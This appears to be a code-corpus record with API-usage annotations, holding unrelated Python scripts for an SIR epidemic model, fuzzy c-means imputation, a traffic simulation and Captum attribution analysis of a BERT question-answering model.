R_arr = np.zeros(len(t))
for i in range(len(R_arr)):
R_arr[i] = N - S_arr[i] - I_arr[i]
return R_arr
def calc_I(S_arr):
C = I_start - gam / bet * np.log(S_start) + S_start # C - const
I_arr = np.zeros(len(t))
for i in range(len(I_arr)):
I_arr[i] = gam / bet * np.log(S_arr[i]) - S_arr[i] + C
return I_arr
def two_equation_ode_plot(t, sym, labelt='$t$', labels=['S', 'I', 'R']):
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(10, 4))
# plot drawing (S, I)
for i in range(len(labels) - 1):
ax.plot(t, sym[:, i], label=labels[i])
# plot drawing (R)
ax.plot(t, calc_R(sym[:, 0], sym[:, 1]), label=labels[2])
ax.set_xlabel(labelt, fontsize=14)
ax.set_ylabel('stan', fontsize=14)
ax.set_ylim([0, 1])
ax.legend()
plt.show()
def one_equation_ode_plot(t, sym, labelt='$t$', labels=['S', 'I', 'R']):
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(10, 4))
# plot drawing (S)
ax.plot(t, sym[:, 0], label=labels[0])
# plot drawing (I)
I_arr = calc_I(sym[:, 0])
ax.plot(t, I_arr, label=labels[2])
# plot drawing (R)
ax.plot(t, calc_R(sym[:, 0], I_arr), label=labels[2])
ax.set_xlabel(labelt, fontsize=14)
ax.set_ylabel('stan', fontsize=14)
ax.set_ylim([0, 1])
ax.legend()
plt.show()
def two_equation_ode_main():
start_state = S_start, I_start
sym = odeint(two_diff_ode_equation, start_state, t, args=(bet, gam))
two_equation_ode_plot(t, sym, labels=['S', 'I', 'R'])
def one_equation_ode_main():
start_state = S_start
sym = odeint(one_diff_equation_ode, start_state, t, args=(bet, gam))
one_equation_ode_plot(t, sym, labels=['S', 'I', 'R'])
# using manual
# ---------------------------------------------------------------------------------------------------------------------#
S = np.zeros(len(t))
S[0] = S_start
I = np.zeros(len(t))
I[0] = I_start
R = np.zeros(len(t))
R[0] = R_start
def two_diff_equation_manual():
for i in range(t.size - 1):
S[i + 1] = S[i] + h * (- bet * I[i] * S[i] / N)
I[i + 1] = I[i] + h * (bet * I[i] * S[i + 1] / N - gam * I[i])
R[i + 1] = N - S[i + 1] - I[i + 1]
def one_diff_equation_manual():
C = I_start - gam / bet * np.log(S_start) + S_start # C - const
for i in range(t.size - 1):
S[i + 1] = S[i] + h * (-bet / N * S[i] * (gam / bet * np.log(S[i]) - S[i] + C))
I[i + 1] = gam / bet * np.log(S[i + 1]) - S[i + 1] + C
R[i + 1] = N - S[i + 1] - I[i + 1]
def equation_man_plot(t, sirList, labelt='$t$', labels=['S', 'I', 'R']):
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(10, 4))
# plot drawing (R, S, I)
for i in range(len(sirList)):
ax.plot(t, sirList[i], label=labels[i])
ax.set_xlabel(labelt, fontsize=14)
ax.set_ylabel('stan', fontsize=14)
ax.set_ylim([0, 1])
ax.legend()
plt.show()
def two_equation_man_main():
two_diff_equation_manual()
equation_man_plot(t, [S, I, R], labels=['S', 'I', 'R'])
def one_equation_man_main():
one_diff_equation_manual()
equation_man_plot(t, [S, I, R], labels=['S', 'I', 'R'])
if __name__ == "__main__":
# one_equation_ode_main()
# one_equation_man_main()
# two_equation_ode_main()
two_equation_man_main()
exit(0)
|
[
"scipy.integrate.odeint",
"numpy.log",
"matplotlib.pyplot.subplots",
"numpy.arange",
"matplotlib.pyplot.show"
] |
[((108, 146), 'numpy.arange', 'np.arange', ([], {'start': '(0)', 'stop': '(T + h)', 'step': 'h'}), '(start=0, stop=T + h, step=h)\n', (117, 146), True, 'import numpy as np\n'), ((1261, 1308), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(1)', 'ncols': '(1)', 'figsize': '(10, 4)'}), '(nrows=1, ncols=1, figsize=(10, 4))\n', (1273, 1308), True, 'import matplotlib.pyplot as plt\n'), ((1628, 1638), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1636, 1638), True, 'import matplotlib.pyplot as plt\n'), ((1728, 1775), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(1)', 'ncols': '(1)', 'figsize': '(10, 4)'}), '(nrows=1, ncols=1, figsize=(10, 4))\n', (1740, 1775), True, 'import matplotlib.pyplot as plt\n'), ((2139, 2149), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2147, 2149), True, 'import matplotlib.pyplot as plt\n'), ((2226, 2288), 'scipy.integrate.odeint', 'odeint', (['two_diff_ode_equation', 'start_state', 't'], {'args': '(bet, gam)'}), '(two_diff_ode_equation, start_state, t, args=(bet, gam))\n', (2232, 2288), False, 'from scipy.integrate import odeint\n'), ((2414, 2476), 'scipy.integrate.odeint', 'odeint', (['one_diff_equation_ode', 'start_state', 't'], {'args': '(bet, gam)'}), '(one_diff_equation_ode, start_state, t, args=(bet, gam))\n', (2420, 2476), False, 'from scipy.integrate import odeint\n'), ((3435, 3482), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(1)', 'ncols': '(1)', 'figsize': '(10, 4)'}), '(nrows=1, ncols=1, figsize=(10, 4))\n', (3447, 3482), True, 'import matplotlib.pyplot as plt\n'), ((3716, 3726), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3724, 3726), True, 'import matplotlib.pyplot as plt\n'), ((691, 706), 'numpy.log', 'np.log', (['S_start'], {}), '(S_start)\n', (697, 706), True, 'import numpy as np\n'), ((992, 1007), 'numpy.log', 'np.log', (['S_start'], {}), '(S_start)\n', (998, 1007), True, 'import numpy as np\n'), ((3081, 3096), 'numpy.log', 'np.log', (['S_start'], {}), '(S_start)\n', (3087, 3096), True, 'import numpy as np\n'), ((1123, 1139), 'numpy.log', 'np.log', (['S_arr[i]'], {}), '(S_arr[i])\n', (1129, 1139), True, 'import numpy as np\n'), ((3271, 3287), 'numpy.log', 'np.log', (['S[i + 1]'], {}), '(S[i + 1])\n', (3277, 3287), True, 'import numpy as np\n'), ((771, 780), 'numpy.log', 'np.log', (['S'], {}), '(S)\n', (777, 780), True, 'import numpy as np\n'), ((3214, 3226), 'numpy.log', 'np.log', (['S[i]'], {}), '(S[i])\n', (3220, 3226), True, 'import numpy as np\n')]
|
import numpy as np
from skfuzzy import cmeans
from config import NAN, FCMParam
class FCMeansEstimator:
def __init__(self, c, m, data):
self.c = c
self.m = m
self.data = data
self.complete_rows, self.incomplete_rows = self.__extract_rows()
# Extract complete and incomplete rows
def __extract_rows(self):
rows, columns = len(self.data), len(self.data[0])
complete_rows, incomplete_rows = [], []
for i in range(rows):
for j in range(columns):
if self.data[i][j] == NAN:
incomplete_rows.append(i)
break
complete_rows.append(i)
return np.array(complete_rows), np.array(incomplete_rows)
# Estimate the missing values
def estimate_missing_values(self):
estimated_data = []
complete_data = np.array([self.data[x] for x in self.complete_rows])
centers, _, _, _, _, _, _ = cmeans(data=complete_data.transpose(), c=self.c, m=self.m, error=FCMParam.ERROR,
maxiter=FCMParam.MAX_ITR, init=None)
# Calculate distance between two points based on euclidean distance
def calculate_distance(data_1, data_2):
return np.linalg.norm(data_1 - data_2)
# Calculate the membership value for given point
def calculate_membership(dist_matrix, distance, m):
numerator = np.power(distance, -2 / (1 - m))
denominator = np.array([np.power(x, -2 / (1 - m)) for x in dist_matrix]).sum()
return numerator / denominator
for i in self.incomplete_rows:
estimated = 0
dist, membership_value = [], []
miss_ind = np.where(self.data[i] == NAN)[0][0]
for center in centers:
dist.append(calculate_distance(data_1=np.delete(np.array(center), miss_ind),
data_2=np.delete(np.array(self.data[i]), miss_ind)))
for d in dist:
membership_value.append(calculate_membership(dist, d, self.m))
for k in range(self.c):
estimated += centers[k][miss_ind] * membership_value[k]
estimated_data.append(estimated)
return np.array(estimated_data)
|
[
"numpy.where",
"numpy.array",
"numpy.power",
"numpy.linalg.norm"
] |
[((873, 925), 'numpy.array', 'np.array', (['[self.data[x] for x in self.complete_rows]'], {}), '([self.data[x] for x in self.complete_rows])\n', (881, 925), True, 'import numpy as np\n'), ((2284, 2308), 'numpy.array', 'np.array', (['estimated_data'], {}), '(estimated_data)\n', (2292, 2308), True, 'import numpy as np\n'), ((696, 719), 'numpy.array', 'np.array', (['complete_rows'], {}), '(complete_rows)\n', (704, 719), True, 'import numpy as np\n'), ((721, 746), 'numpy.array', 'np.array', (['incomplete_rows'], {}), '(incomplete_rows)\n', (729, 746), True, 'import numpy as np\n'), ((1267, 1298), 'numpy.linalg.norm', 'np.linalg.norm', (['(data_1 - data_2)'], {}), '(data_1 - data_2)\n', (1281, 1298), True, 'import numpy as np\n'), ((1441, 1473), 'numpy.power', 'np.power', (['distance', '(-2 / (1 - m))'], {}), '(distance, -2 / (1 - m))\n', (1449, 1473), True, 'import numpy as np\n'), ((1741, 1770), 'numpy.where', 'np.where', (['(self.data[i] == NAN)'], {}), '(self.data[i] == NAN)\n', (1749, 1770), True, 'import numpy as np\n'), ((1510, 1535), 'numpy.power', 'np.power', (['x', '(-2 / (1 - m))'], {}), '(x, -2 / (1 - m))\n', (1518, 1535), True, 'import numpy as np\n'), ((1877, 1893), 'numpy.array', 'np.array', (['center'], {}), '(center)\n', (1885, 1893), True, 'import numpy as np\n'), ((1970, 1992), 'numpy.array', 'np.array', (['self.data[i]'], {}), '(self.data[i])\n', (1978, 1992), True, 'import numpy as np\n')]
|
import sim
import utils
import numpy as np
import matplotlib.pyplot as plt
import argparse
def main():
my_parser = argparse.ArgumentParser(description='Parameters for Simulation')
my_parser.add_argument('-N', '--n_cars', type=int, action='store', help='Number of cars', default = 40)
my_parser.add_argument('-L', '--length', type=int, action='store', help='Length of road', default = 250)
my_parser.add_argument('-P', '--p_break', type=float, action='store', help='probability of stopping', default = 0.1)
my_parser.add_argument('-S', '--steps', type=int, action='store', help='Steps of simulation', required = True)
args = my_parser.parse_args()
print(dir(args))
N=args.n_cars
L=args.length
pos = np.zeros(N)
vel = np.zeros(N)
sim.populate_arrays(pos,vel,N)
pos_list = sim.run_simulation(pos,vel,N,L, MAX_STEPS=args.steps, p = args.p_break)
flow = utils.estimate_flow(pos_list,N, 0,250)
sim_fig = utils.plot_simulation(pos_list)
plt.show()
if __name__ == '__main__':
main()
|
[
"sim.populate_arrays",
"utils.plot_simulation",
"argparse.ArgumentParser",
"utils.estimate_flow",
"sim.run_simulation",
"numpy.zeros",
"matplotlib.pyplot.show"
] |
[((122, 186), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Parameters for Simulation"""'}), "(description='Parameters for Simulation')\n", (145, 186), False, 'import argparse\n'), ((744, 755), 'numpy.zeros', 'np.zeros', (['N'], {}), '(N)\n', (752, 755), True, 'import numpy as np\n'), ((766, 777), 'numpy.zeros', 'np.zeros', (['N'], {}), '(N)\n', (774, 777), True, 'import numpy as np\n'), ((783, 815), 'sim.populate_arrays', 'sim.populate_arrays', (['pos', 'vel', 'N'], {}), '(pos, vel, N)\n', (802, 815), False, 'import sim\n'), ((829, 901), 'sim.run_simulation', 'sim.run_simulation', (['pos', 'vel', 'N', 'L'], {'MAX_STEPS': 'args.steps', 'p': 'args.p_break'}), '(pos, vel, N, L, MAX_STEPS=args.steps, p=args.p_break)\n', (847, 901), False, 'import sim\n'), ((912, 952), 'utils.estimate_flow', 'utils.estimate_flow', (['pos_list', 'N', '(0)', '(250)'], {}), '(pos_list, N, 0, 250)\n', (931, 952), False, 'import utils\n'), ((965, 996), 'utils.plot_simulation', 'utils.plot_simulation', (['pos_list'], {}), '(pos_list)\n', (986, 996), False, 'import utils\n'), ((1001, 1011), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1009, 1011), True, 'import matplotlib.pyplot as plt\n')]
|
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
from transformers import BertTokenizer, BertForQuestionAnswering, BertConfig
from captum.attr import visualization as viz
from captum.attr import LayerConductance, LayerIntegratedGradients
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
model_path = "<PATH-TO-SAVED-MODEL>"
model = BertForQuestionAnswering.from_pretrained(model_path)
model.to(device)
model.eval()
model.zero_grad()
tokenizer = BertTokenizer.from_pretrained(model_path)
def predict(inputs, token_type_ids=None, position_ids=None, attention_mask=None):
output = model(
inputs,
token_type_ids=token_type_ids,
position_ids=position_ids,
attention_mask=attention_mask,
)
return output.start_logits, output.end_logits
def squad_pos_forward_func(inputs, token_type_ids=None, position_ids=None, attention_mask=None, position=0):
pred = predict(inputs, token_type_ids=token_type_ids, position_ids=position_ids, attention_mask=attention_mask)
pred = pred[position]
return pred.max(1).values
ref_token_id = tokenizer.pad_token_id
sep_token_id = tokenizer.sep_token_id
cls_token_id = tokenizer.cls_token_id
def construct_input_ref_pair(question, text, ref_token_id, sep_token_id, cls_token_id):
question_ids = tokenizer.encode(question, add_special_tokens=False)
text_ids = tokenizer.encode(text, add_special_tokens=False)
input_ids = [cls_token_id] + question_ids + [sep_token_id] + text_ids + [sep_token_id]
ref_input_ids = (
[cls_token_id]
+ [ref_token_id] * len(question_ids)
+ [sep_token_id]
+ [ref_token_id] * len(text_ids)
+ [sep_token_id]
)
return torch.tensor([input_ids], device=device), torch.tensor([ref_input_ids], device=device), len(question_ids)
def construct_input_ref_token_type_pair(input_ids, sep_ind=0):
seq_len = input_ids.size(1)
token_type_ids = torch.tensor([[0 if i <= sep_ind else 1 for i in range(seq_len)]], device=device)
ref_token_type_ids = torch.zeros_like(token_type_ids, device=device)
return token_type_ids, ref_token_type_ids
def construct_input_ref_pos_id_pair(input_ids):
seq_length = input_ids.size(1)
position_ids = torch.arange(seq_length, dtype=torch.long, device=device)
ref_position_ids = torch.zeros(seq_length, dtype=torch.long, device=device)
position_ids = position_ids.unsqueeze(0).expand_as(input_ids)
ref_position_ids = ref_position_ids.unsqueeze(0).expand_as(input_ids)
return position_ids, ref_position_ids
def construct_attention_mask(input_ids):
return torch.ones_like(input_ids)
def construct_whole_bert_embeddings(
input_ids, ref_input_ids, token_type_ids=None, ref_token_type_ids=None, position_ids=None, ref_position_ids=None
):
input_embeddings = model.bert.embeddings(input_ids, token_type_ids=token_type_ids, position_ids=position_ids)
ref_input_embeddings = model.bert.embeddings(
ref_input_ids, token_type_ids=ref_token_type_ids, position_ids=ref_position_ids
)
return input_embeddings, ref_input_embeddings
question, text = (
"What is important to us?",
"It is important to us to include, empower and support humans of all kinds.",
)
input_ids, ref_input_ids, sep_id = construct_input_ref_pair(question, text, ref_token_id, sep_token_id, cls_token_id)
token_type_ids, ref_token_type_ids = construct_input_ref_token_type_pair(input_ids, sep_id)
position_ids, ref_position_ids = construct_input_ref_pos_id_pair(input_ids)
attention_mask = construct_attention_mask(input_ids)
indices = input_ids[0].detach().tolist()
all_tokens = tokenizer.convert_ids_to_tokens(indices)
ground_truth = "to include, empower and support humans of all kinds"
ground_truth_tokens = tokenizer.encode(ground_truth, add_special_tokens=False)
ground_truth_end_ind = indices.index(ground_truth_tokens[-1])
ground_truth_start_ind = ground_truth_end_ind - len(ground_truth_tokens) + 1
start_scores, end_scores = predict(
input_ids, token_type_ids=token_type_ids, position_ids=position_ids, attention_mask=attention_mask
)
print("Question: ", question)
print("Predicted Answer: ", " ".join(all_tokens[torch.argmax(start_scores) : torch.argmax(end_scores) + 1]))
lig = LayerIntegratedGradients(squad_pos_forward_func, model.bert.embeddings)
attributions_start, delta_start = lig.attribute(
inputs=input_ids,
baselines=ref_input_ids,
additional_forward_args=(token_type_ids, position_ids, attention_mask, 0),
return_convergence_delta=True,
)
attributions_end, delta_end = lig.attribute(
inputs=input_ids,
baselines=ref_input_ids,
additional_forward_args=(token_type_ids, position_ids, attention_mask, 1),
return_convergence_delta=True,
)
def summarize_attributions(attributions):
attributions = attributions.sum(dim=-1).squeeze(0)
attributions = attributions / torch.norm(attributions)
return attributions
attributions_start_sum = summarize_attributions(attributions_start)
attributions_end_sum = summarize_attributions(attributions_end)
start_position_vis = viz.VisualizationDataRecord(
attributions_start_sum,
torch.max(torch.softmax(start_scores[0], dim=0)),
torch.argmax(start_scores),
torch.argmax(start_scores),
str(ground_truth_start_ind),
attributions_start_sum.sum(),
all_tokens,
delta_start,
)
end_position_vis = viz.VisualizationDataRecord(
attributions_end_sum,
torch.max(torch.softmax(end_scores[0], dim=0)),
torch.argmax(end_scores),
torch.argmax(end_scores),
str(ground_truth_end_ind),
attributions_end_sum.sum(),
all_tokens,
delta_end,
)
print("\033[1m", "Visualizations For Start Position", "\033[0m")
viz.visualize_text([start_position_vis])
print("\033[1m", "Visualizations For End Position", "\033[0m")
viz.visualize_text([end_position_vis])
from IPython.display import Image
Image(filename="img/bert/visuals_of_start_end_predictions.png")
lig2 = LayerIntegratedGradients(
squad_pos_forward_func,
[
model.bert.embeddings.word_embeddings,
model.bert.embeddings.token_type_embeddings,
model.bert.embeddings.position_embeddings,
],
)
attributions_start = lig2.attribute(
inputs=(input_ids, token_type_ids, position_ids),
baselines=(ref_input_ids, ref_token_type_ids, ref_position_ids),
additional_forward_args=(attention_mask, 0),
)
attributions_end = lig2.attribute(
inputs=(input_ids, token_type_ids, position_ids),
baselines=(ref_input_ids, ref_token_type_ids, ref_position_ids),
additional_forward_args=(attention_mask, 1),
)
attributions_start_word = summarize_attributions(attributions_start[0])
attributions_end_word = summarize_attributions(attributions_end[0])
attributions_start_token_type = summarize_attributions(attributions_start[1])
attributions_end_token_type = summarize_attributions(attributions_end[1])
attributions_start_position = summarize_attributions(attributions_start[2])
attributions_end_position = summarize_attributions(attributions_end[2])
def get_topk_attributed_tokens(attrs, k=5):
values, indices = torch.topk(attrs, k)
top_tokens = [all_tokens[idx] for idx in indices]
return top_tokens, values, indices
top_words_start, top_words_val_start, top_word_ind_start = get_topk_attributed_tokens(attributions_start_word)
top_words_end, top_words_val_end, top_words_ind_end = get_topk_attributed_tokens(attributions_end_word)
top_token_type_start, top_token_type_val_start, top_token_type_ind_start = get_topk_attributed_tokens(
attributions_start_token_type
)
top_token_type_end, top_token_type_val_end, top_token_type_ind_end = get_topk_attributed_tokens(
attributions_end_token_type
)
top_pos_start, top_pos_val_start, pos_ind_start = get_topk_attributed_tokens(attributions_start_position)
top_pos_end, top_pos_val_end, pos_ind_end = get_topk_attributed_tokens(attributions_end_position)
df_start = pd.DataFrame(
{
"Word(Index), Attribution": [
"{} ({}), {}".format(word, pos, round(val.item(), 2))
for word, pos, val in zip(top_words_start, top_word_ind_start, top_words_val_start)
],
"Token Type(Index), Attribution": [
"{} ({}), {}".format(ttype, pos, round(val.item(), 2))
for ttype, pos, val in zip(top_token_type_start, top_token_type_ind_start, top_words_val_start)
],
"Position(Index), Attribution": [
"{} ({}), {}".format(position, pos, round(val.item(), 2))
for position, pos, val in zip(top_pos_start, pos_ind_start, top_pos_val_start)
],
}
)
df_start.style.apply(["cell_ids: False"])
df_end = pd.DataFrame(
{
"Word(Index), Attribution": [
"{} ({}), {}".format(word, pos, round(val.item(), 2))
for word, pos, val in zip(top_words_end, top_words_ind_end, top_words_val_end)
],
"Token Type(Index), Attribution": [
"{} ({}), {}".format(ttype, pos, round(val.item(), 2))
for ttype, pos, val in zip(top_token_type_end, top_token_type_ind_end, top_words_val_end)
],
"Position(Index), Attribution": [
"{} ({}), {}".format(position, pos, round(val.item(), 2))
for position, pos, val in zip(top_pos_end, pos_ind_end, top_pos_val_end)
],
}
)
df_end.style.apply(["cell_ids: False"])
["{}({})".format(token, str(i)) for i, token in enumerate(all_tokens)]
df_start
df_end
def squad_pos_forward_func2(input_emb, attention_mask=None, position=0):
pred = model(
inputs_embeds=input_emb,
attention_mask=attention_mask,
)
pred = pred[position]
return pred.max(1).values
layer_attrs_start = []
layer_attrs_end = []
token_to_explain = 23
layer_attrs_start_dist = []
layer_attrs_end_dist = []
input_embeddings, ref_input_embeddings = construct_whole_bert_embeddings(
input_ids,
ref_input_ids,
token_type_ids=token_type_ids,
ref_token_type_ids=ref_token_type_ids,
position_ids=position_ids,
ref_position_ids=ref_position_ids,
)
for i in range(model.config.num_hidden_layers):
lc = LayerConductance(squad_pos_forward_func2, model.bert.encoder.layer[i])
layer_attributions_start = lc.attribute(
inputs=input_embeddings, baselines=ref_input_embeddings, additional_forward_args=(attention_mask, 0)
)
layer_attributions_end = lc.attribute(
inputs=input_embeddings, baselines=ref_input_embeddings, additional_forward_args=(attention_mask, 1)
)
layer_attrs_start.append(summarize_attributions(layer_attributions_start).cpu().detach().tolist())
layer_attrs_end.append(summarize_attributions(layer_attributions_end).cpu().detach().tolist())
layer_attrs_start_dist.append(layer_attributions_start[0, token_to_explain, :].cpu().detach().tolist())
layer_attrs_end_dist.append(layer_attributions_end[0, token_to_explain, :].cpu().detach().tolist())
fig, ax = plt.subplots(figsize=(15, 5))
xticklabels = all_tokens
yticklabels = list(range(1, 13))
ax = sns.heatmap(np.array(layer_attrs_start), xticklabels=xticklabels, yticklabels=yticklabels, linewidth=0.2)
plt.xlabel("Tokens")
plt.ylabel("Layers")
plt.show()
fig, ax = plt.subplots(figsize=(15, 5))
xticklabels = all_tokens
yticklabels = list(range(1, 13))
ax = sns.heatmap(np.array(layer_attrs_end), xticklabels=xticklabels, yticklabels=yticklabels, linewidth=0.2)
plt.xlabel("Tokens")
plt.ylabel("Layers")
plt.show()
fig, ax = plt.subplots(figsize=(20, 10))
ax = sns.boxplot(data=layer_attrs_start_dist)
plt.xlabel("Layers")
plt.ylabel("Attribution")
plt.show()
fig, ax = plt.subplots(figsize=(20, 10))
ax = sns.boxplot(data=layer_attrs_end_dist)
plt.xlabel("Layers")
plt.ylabel("Attribution")
plt.show()
def pdf_attr(attrs, bins=100):
return np.histogram(attrs, bins=bins, density=True)[0]
layer_attrs_end_pdf = map(lambda layer_attrs_end_dist: pdf_attr(layer_attrs_end_dist), layer_attrs_end_dist)
layer_attrs_end_pdf = np.array(list(layer_attrs_end_pdf))
attr_sum = np.array(layer_attrs_end_dist).sum(-1)
layer_attrs_end_pdf_norm = np.linalg.norm(layer_attrs_end_pdf, axis=-1, ord=1)
layer_attrs_end_pdf = np.transpose(layer_attrs_end_pdf)
layer_attrs_end_pdf = np.divide(layer_attrs_end_pdf, layer_attrs_end_pdf_norm, where=layer_attrs_end_pdf_norm != 0)
fig, ax = plt.subplots(figsize=(20, 10))
plt.plot(layer_attrs_end_pdf)
plt.xlabel("Bins")
plt.ylabel("Density")
plt.legend(["Layer " + str(i) for i in range(1, 13)])
plt.show()
fig, ax = plt.subplots(figsize=(20, 10))
layer_attrs_end_pdf[layer_attrs_end_pdf == 0] = 1
layer_attrs_end_pdf_log = np.log2(layer_attrs_end_pdf)
entropies = -(layer_attrs_end_pdf * layer_attrs_end_pdf_log).sum(0)
plt.scatter(np.arange(12), attr_sum, s=entropies * 100)
plt.xlabel("Layers")
plt.ylabel("Total Attribution")
plt.show()
|
[
"matplotlib.pyplot.ylabel",
"torch.softmax",
"numpy.array",
"torch.cuda.is_available",
"numpy.linalg.norm",
"torch.arange",
"numpy.divide",
"numpy.arange",
"numpy.histogram",
"captum.attr.LayerIntegratedGradients",
"matplotlib.pyplot.xlabel",
"IPython.display.Image",
"captum.attr.visualization.visualize_text",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.subplots",
"torch.zeros_like",
"torch.argmax",
"torch.ones_like",
"torch.topk",
"torch.norm",
"numpy.log2",
"numpy.transpose",
"matplotlib.pyplot.show",
"transformers.BertForQuestionAnswering.from_pretrained",
"transformers.BertTokenizer.from_pretrained",
"seaborn.boxplot",
"torch.tensor",
"captum.attr.LayerConductance",
"torch.zeros"
] |
[((440, 492), 'transformers.BertForQuestionAnswering.from_pretrained', 'BertForQuestionAnswering.from_pretrained', (['model_path'], {}), '(model_path)\n', (480, 492), False, 'from transformers import BertTokenizer, BertForQuestionAnswering, BertConfig\n'), ((554, 595), 'transformers.BertTokenizer.from_pretrained', 'BertTokenizer.from_pretrained', (['model_path'], {}), '(model_path)\n', (583, 595), False, 'from transformers import BertTokenizer, BertForQuestionAnswering, BertConfig\n'), ((4349, 4420), 'captum.attr.LayerIntegratedGradients', 'LayerIntegratedGradients', (['squad_pos_forward_func', 'model.bert.embeddings'], {}), '(squad_pos_forward_func, model.bert.embeddings)\n', (4373, 4420), False, 'from captum.attr import LayerConductance, LayerIntegratedGradients\n'), ((5814, 5854), 'captum.attr.visualization.visualize_text', 'viz.visualize_text', (['[start_position_vis]'], {}), '([start_position_vis])\n', (5832, 5854), True, 'from captum.attr import visualization as viz\n'), ((5919, 5957), 'captum.attr.visualization.visualize_text', 'viz.visualize_text', (['[end_position_vis]'], {}), '([end_position_vis])\n', (5937, 5957), True, 'from captum.attr import visualization as viz\n'), ((5994, 6057), 'IPython.display.Image', 'Image', ([], {'filename': '"""img/bert/visuals_of_start_end_predictions.png"""'}), "(filename='img/bert/visuals_of_start_end_predictions.png')\n", (5999, 6057), False, 'from IPython.display import Image\n'), ((6066, 6253), 'captum.attr.LayerIntegratedGradients', 'LayerIntegratedGradients', (['squad_pos_forward_func', '[model.bert.embeddings.word_embeddings, model.bert.embeddings.\n token_type_embeddings, model.bert.embeddings.position_embeddings]'], {}), '(squad_pos_forward_func, [model.bert.embeddings.\n word_embeddings, model.bert.embeddings.token_type_embeddings, model.\n bert.embeddings.position_embeddings])\n', (6090, 6253), False, 'from captum.attr import LayerConductance, LayerIntegratedGradients\n'), ((11048, 11077), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(15, 5)'}), '(figsize=(15, 5))\n', (11060, 11077), True, 'import matplotlib.pyplot as plt\n'), ((11247, 11267), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Tokens"""'], {}), "('Tokens')\n", (11257, 11267), True, 'import matplotlib.pyplot as plt\n'), ((11268, 11288), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Layers"""'], {}), "('Layers')\n", (11278, 11288), True, 'import matplotlib.pyplot as plt\n'), ((11289, 11299), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11297, 11299), True, 'import matplotlib.pyplot as plt\n'), ((11311, 11340), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(15, 5)'}), '(figsize=(15, 5))\n', (11323, 11340), True, 'import matplotlib.pyplot as plt\n'), ((11508, 11528), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Tokens"""'], {}), "('Tokens')\n", (11518, 11528), True, 'import matplotlib.pyplot as plt\n'), ((11529, 11549), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Layers"""'], {}), "('Layers')\n", (11539, 11549), True, 'import matplotlib.pyplot as plt\n'), ((11550, 11560), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11558, 11560), True, 'import matplotlib.pyplot as plt\n'), ((11572, 11602), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (11584, 11602), True, 'import matplotlib.pyplot as plt\n'), ((11608, 11648), 'seaborn.boxplot', 'sns.boxplot', ([], {'data': 'layer_attrs_start_dist'}), '(data=layer_attrs_start_dist)\n', (11619, 11648), True, 'import seaborn as sns\n'), ((11649, 11669), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Layers"""'], {}), "('Layers')\n", (11659, 11669), True, 'import matplotlib.pyplot as plt\n'), ((11670, 11695), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Attribution"""'], {}), "('Attribution')\n", (11680, 11695), True, 'import matplotlib.pyplot as plt\n'), ((11696, 11706), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11704, 11706), True, 'import matplotlib.pyplot as plt\n'), ((11718, 11748), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (11730, 11748), True, 'import matplotlib.pyplot as plt\n'), ((11754, 11792), 'seaborn.boxplot', 'sns.boxplot', ([], {'data': 'layer_attrs_end_dist'}), '(data=layer_attrs_end_dist)\n', (11765, 11792), True, 'import seaborn as sns\n'), ((11793, 11813), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Layers"""'], {}), "('Layers')\n", (11803, 11813), True, 'import matplotlib.pyplot as plt\n'), ((11814, 11839), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Attribution"""'], {}), "('Attribution')\n", (11824, 11839), True, 'import matplotlib.pyplot as plt\n'), ((11840, 11850), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11848, 11850), True, 'import matplotlib.pyplot as plt\n'), ((12190, 12241), 'numpy.linalg.norm', 'np.linalg.norm', (['layer_attrs_end_pdf'], {'axis': '(-1)', 'ord': '(1)'}), '(layer_attrs_end_pdf, axis=-1, ord=1)\n', (12204, 12241), True, 'import numpy as np\n'), ((12264, 12297), 'numpy.transpose', 'np.transpose', (['layer_attrs_end_pdf'], {}), '(layer_attrs_end_pdf)\n', (12276, 12297), True, 'import numpy as np\n'), ((12320, 12418), 'numpy.divide', 'np.divide', (['layer_attrs_end_pdf', 'layer_attrs_end_pdf_norm'], {'where': '(layer_attrs_end_pdf_norm != 0)'}), '(layer_attrs_end_pdf, layer_attrs_end_pdf_norm, where=\n layer_attrs_end_pdf_norm != 0)\n', (12329, 12418), True, 'import numpy as np\n'), ((12425, 12455), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (12437, 12455), True, 'import matplotlib.pyplot as plt\n'), ((12456, 12485), 'matplotlib.pyplot.plot', 'plt.plot', (['layer_attrs_end_pdf'], {}), '(layer_attrs_end_pdf)\n', (12464, 12485), True, 'import matplotlib.pyplot as plt\n'), ((12486, 12504), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Bins"""'], 